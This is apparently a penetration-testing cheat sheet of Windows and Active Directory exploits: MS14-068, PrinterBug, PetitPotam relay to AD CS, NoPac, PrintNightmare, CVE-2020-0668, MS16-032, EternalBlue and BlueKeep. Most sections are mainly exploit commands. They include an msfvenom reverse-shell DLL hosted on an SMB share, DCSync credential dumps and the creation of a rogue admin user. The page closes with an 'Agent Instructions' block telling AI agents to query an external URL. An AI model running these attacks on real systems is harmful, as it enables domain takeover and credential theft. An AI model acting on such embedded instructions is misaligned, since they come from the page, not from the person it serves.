### NTLM Hash via RAR/ZIP
Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.
[Exploit](https://github.com/0x6rss/CVE-2025-24071_PoC)
{% code overflow="wrap" %}
```bash
python3 poc.py
# > enter file name:
# > enter IP:
```
{% endcode %}
Once the file has been created, launch [responder](https://github.com/lgandx/Responder) and upload the file to the vulnerable point, which will unzip it and give us the hash.
### Kerberos Checksum Vulnerability
This was a flaw in the Kerberos protocol, which could be leveraged along with standard domain user credentials to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation.The vulnerability allowed a forged PAC to be accepted by the KDC as legitimate. This can be leveraged to create a fake PAC, presenting a user as a member of the Domain Administrators or other privileged group. For more info see [HERE](https://legacy.thehacker.recipes/a-d/movement/kerberos/forged-tickets/ms14-068).
[Exploit](https://github.com/mubix/pykek/blob/master/ms14-068.py) to get TGT
{% code overflow="wrap" %}
```bash
# with a plaintext password
ms14-068.py -u ''@'' -p '' -s '' -d ''
```
{% endcode %}
{% code overflow="wrap" %}
```bash
# with pass-the-hash
ms14-068.py -u ''@'' --rc4 '' -s '' -d ''
```
{% endcode %}
[Impacket-Exploit](https://github.com/fortra/impacket/blob/master/examples/goldenPac.py) to open a privileged session using the obtained TGT and PsExec
{% code overflow="wrap" %}
```bash
goldenPac.py /:@ -dc-ip
```
{% endcode %}
[Metasploit](/rednote/utility/c2-and-exploitation-framework/metasploit.md)
```
admin/kerberos/ms14_068_kerberos_checksum
```
### PrinterBug *or* SpoolSample
The Printer Bug is a flaw in the MS-RPRN protocol (Print System Remote Protocol). This protocol defines the communication of print job processing and print system management between a client and a print server. To leverage this flaw, any domain user can connect to the spool's named pipe with the `RpcOpenPrinter` method and use the `RpcRemoteFindFirstPrinterChangeNotificationEx` method, and force the server to authenticate to any host provided by the client over SMB. The spooler service runs as SYSTEM and is installed by default in Windows servers running Desktop Experience.
Set [responder](https://github.com/lgandx/Responder)
{% code overflow="wrap" %}
```bash
sudo responder -I
```
{% endcode %}
Using PowerShell, get a list of Windows boxes (servers are usually priority)
{% code overflow="wrap" %}
```powershell
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
```
{% endcode %}
{% tabs %}
{% tab title="Linux (Remotely)" %}
With [rpcdump.py](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) see if the Spooler Service is listening
{% code overflow="wrap" %}
```bash
rpcdump.py /:@ | grep MS-RPRN
```
{% endcode %}
Now, with [dementor.py](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [printerbug.py](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py), ask the service to authenticate against an arbitrary host
{% code overflow="wrap" %}
```bash
python dementor.py -d -u -p
```
{% endcode %}
{% code overflow="wrap" %}
```bash
printerbug.py '/:'@
```
{% endcode %}
{% endtab %}
{% tab title="Windows (Locally)" %}
With [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) see if the Spooler Service is listening
{% code overflow="wrap" %}
```powershell
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
```
{% endcode %}
{% code overflow="wrap" %}
```powershell
Get-SpoolStatus -ComputerName
```
{% endcode %}
Now, with[ SpoolSample](https://github.com/NotMedic/NetNTLMtoSilverTicket), ask the service to authenticate against an arbitrary host
{% code overflow="wrap" %}
```powershell
SpoolSample.exe
```
{% endcode %}
{% endtab %}
{% endtabs %}
### PetitPotam
The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS). For more info, see [this](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) link.
Use [certi](https://github.com/zer1t0/certi) to attempt to locate the Web Enrollment URL for the CA host.
{% code overflow="wrap" %}
```bash
certi find -dc-ip -u -p -d
```
{% endcode %}
Start [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py), specifying the Web Enrollment URL for the CA host and using either the KerberosAuthentication or DomainController AD CS template.
{% code overflow="wrap" %}
```bash
sudo ntlmrelayx.py -debug -smb2support --target /certfnsh.asp --adcs --template DomainController
```
{% endcode %}
Attempt to coerce the Domain Controller to authenticate to our ntlmrelayx
{% tabs %}
{% tab title="PetitPotam" %}
Use [PetitPotam.py](https://github.com/topotam/PetitPotam)
{% code overflow="wrap" %}
```bash
python3 PetitPotam.py
```
{% endcode %}
{% code overflow="wrap" %}
```bash
python3 PetitPotam.py [-d -u -p ]
```
{% endcode %}
Or, if initial access has been established to a domain joined system, use [PetitPotam.exe](https://github.com/topotam/PetitPotam)
{% code overflow="wrap" %}
```powershell
PetitPotam.exe
```
{% endcode %}
{% endtab %}
{% tab title="Mimikatz" %}
Use EFS module in [Mimikatz](https://github.com/gentilkiwi/mimikatz).
{% code overflow="wrap" %}
```
misc::efs /server: /connect:
```
{% endcode %}
{% endtab %}
{% tab title="PowerShell" %}
Use PowerShell implementation of the tool [Invoke-PetitPotam.ps1](https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-Petitpotam.ps1).
{% endtab %}
{% endtabs %}
Obtain the User and the Base64 encoded certificate for the Domain Controller from ntlmrelayx.
Use [gettgtpkinit.py](https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py) to request a TGT for the domain controller.
{% code overflow="wrap" %}
```bash
python3 gettgtpkinit.py /\$ -pfx-base64 .ccache
# take note of KEY
```
{% endcode %}
Set the `KRB5CCNAME` environment variable, so our attack host uses this file for Kerberos authentication attempts
```bash
export KRB5CCNAME=.ccache
```
From [krb5-user](https://packages.ubuntu.com/focal/krb5-user) get TGT info with `klist` command *(default principal)*
Now we can use the TGT to perform various attack
{% tabs %}
{% tab title="DCSync" %}
Then use [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) to perform DCSync
{% code overflow="wrap" %}
```bash
secretsdump.py -just-dc-user /administrator -k -no-pass
```
{% endcode %}
{% endtab %}
{% tab title="getnthash" %}
Then use [getnthash.py](https://github.com/dirkjanm/PKINITtools/blob/master/getnthash.py) from PKINITtools to request the NT hash
{% code overflow="wrap" %}
```bash
python /opt/PKINITtools/getnthash.py -key /
```
{% endcode %}
{% endtab %}
{% endtabs %}
Alternatively, once we obtain the base64 certificate via ntlmrelayx, we could use the certificate with the [Rubeus](https://github.com/GhostPack/Rubeus) tool on a **Windows attack host** to request a TGT ticket and perform a pass-the-ticket (PTT) attack all at once.
{% code overflow="wrap" %}
```powershell
.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate: /ptt
```
{% endcode %}
### SamAccountName Spoofing - NoPac
[CVE-2021-42278](https://nvd.nist.gov/vuln/detail/CVE-2021-42278) is a bypass vulnerability with the Security Account Manager (SAM).\
[CVE-2021-42287](https://nvd.nist.gov/vuln/detail/CVE-2021-42287) is a vulnerability within the Kerberos Privilege Attribute Certificate (PAC) in ADDS.
This exploit path takes advantage of being able to change the `SamAccountName` of a computer account to that of a Domain Controller. By default, authenticated users can add up to 10 computers to a domain. When doing so, we change the name of the new host to match a Domain Controller's SamAccountName. Once done, we must request Kerberos tickets causing the service to issue us tickets under the DC's name instead of the new name. When a TGS is requested, it will issue the ticket with the closest matching name. Once done, we will have access as that service and can even be provided with a SYSTEM shell on a Domain Controller.
Install [impacket](https://github.com/fortra/impacket)
{% code overflow="wrap" %}
```bash
git clone https://github.com/SecureAuthCorp/impacket.git
python setup.py install
```
{% endcode %}
Use [NoPac](https://github.com/Ridter/noPac)
Check if the system is vulnerable
{% code overflow="wrap" %}
```bash
sudo python3 scanner.py /: -dc-ip -use-ldap
# ms-DS-MachineAccountQuota > 0
```
{% endcode %}
Attack the target. (**This could be "noisy" or may be blocked by AV or EDR**)
Impersonate the built-in administrator account and drop into a semi-interactive shell session (`smbexec.py`) on the target Domain Controller.
{% code overflow="wrap" %}
```bash
sudo python3 noPac.py /: -dc-ip -dc-host -shell --impersonate administrator -use-ldap
# NoPac.py does save the TGT in the current directory
```
{% endcode %}
We could then use the TGT ccache file to perform a [Pass-The-Ticket](/rednote/pentesting-process/active-directory/pass-the-ticket.md) and perform further attacks such as [DCSync](/rednote/pentesting-process/active-directory/dc-synchronization.md). We can also use the tool with the `-dump` flag to perform a DCSync using secretsdump.py.
{% code overflow="wrap" %}
```bash
sudo python3 noPac.py /: -dc-ip -dc-host --impersonate administrator -use-ldap -dump -just-dc-user /administrator
```
{% endcode %}
### PrintNightmare
{% tabs %}
{% tab title="Remotely" %}
[Exploit-1](https://github.com/cube0x0/CVE-2021-1675) that execute a malicious DLL.
Install cube0x0's Version of Impacket
{% code overflow="wrap" %}
```bash
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
```
{% endcode %}
We can use `rpcdump.py` to see if "*Print System Asynchronous Protocol*" and "*Print System Remote Protocol*" are exposed on the target.
{% code overflow="wrap" %}
```bash
rpcdump.py @ | egrep 'MS-RPRN|MS-PAR'
```
{% endcode %}
After confirming this, we can crafting a DLL payload using [msfvenom](/rednote/pentesting-process/software-attacks/shellcode.md#msfvenom)
{% code overflow="wrap" %}
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll > backupscript.dll
```
{% endcode %}
We will then host this payload in an [SMB share](/rednote/utility/server.md#smb)
{% code overflow="wrap" %}
```bash
sudo smbserver.py -smb2support /path/to/backupscript.dll
```
{% endcode %}
Now we can use MSF to configure & start a multi handler.
With the share hosting our payload and our multi handler listening for a connection, we can attempt to run the exploit against the target.
{% code overflow="wrap" %}
```bash
sudo python3 CVE-2021-1675.py /:@ '\\\\backupscript.dll'
```
{% endcode %}
{% endtab %}
{% tab title="Locally" %}
[Exploit-2](https://github.com/calebstewart/CVE-2021-1675) in powershell implementation.
Check if the Spooler service is running
{% code overflow="wrap" %}
```powershell
ls \\localhost\pipe\spoolss
```
{% endcode %}
Exploit
{% code overflow="wrap" %}
```powershell
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
```
{% endcode %}
{% endtab %}
{% endtabs %}
### Windows Kernel Elevation of Privilege Vulnerability
[Exploit](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668): Privilege Escalation with [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) or [diaghub](https://github.com/xct/diaghub), or with service that runs in the context of SYSTEM and is startable by unprivileged users.
ex: `` = `C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe`
Check permission with `icacls ` \
Get 2 `malicious.exe` and renames with the name of the service exe.
Run exploit
```powershell
.\CVE-2020-0668.exe
```
Check permission with `icacls ` (all F)
Since `MaliciousExe1` is no longer a valid, exchange it with the second
```powershell
copy /Y
```
Now run the malicious file as system
```powershell
net start
```
### Windows Certificate Dialog Elevation of Privilege Vulnerability
Use [hhupd.exe](https://packetstormsecurity.com/files/14437/hhupd.exe.html) that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
`Right Click on hhupd.exe` > `Run as administrator`\
\> `Show information about the publisher's certificate` > `General` > `Link on "Issued by" and close`
Now we have a browser open as system.
`Right Click on browser` > `Save as` > `c:\windows\system32\cmd.exe in the path`
### Secondary Logon Elevation of Privilege Vulnerability
[Exploit](https://www.exploit-db.com/exploits/39719)
```powershell
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
```
### EternalBlue
SMB v1 vulnerability, [Exploit](https://www.exploit-db.com/exploits/42315)
```powershell
python3 .\42315.py
```
### BlueKeep
RDP vulnerability, [Exploit](https://github.com/RICSecLab/CVE-2019-0708)
```bash
nc -v -l 4444
python3 exploit.py -rp
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ivalexev.gitbook.io/rednote/pentesting-process/cve/windows.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.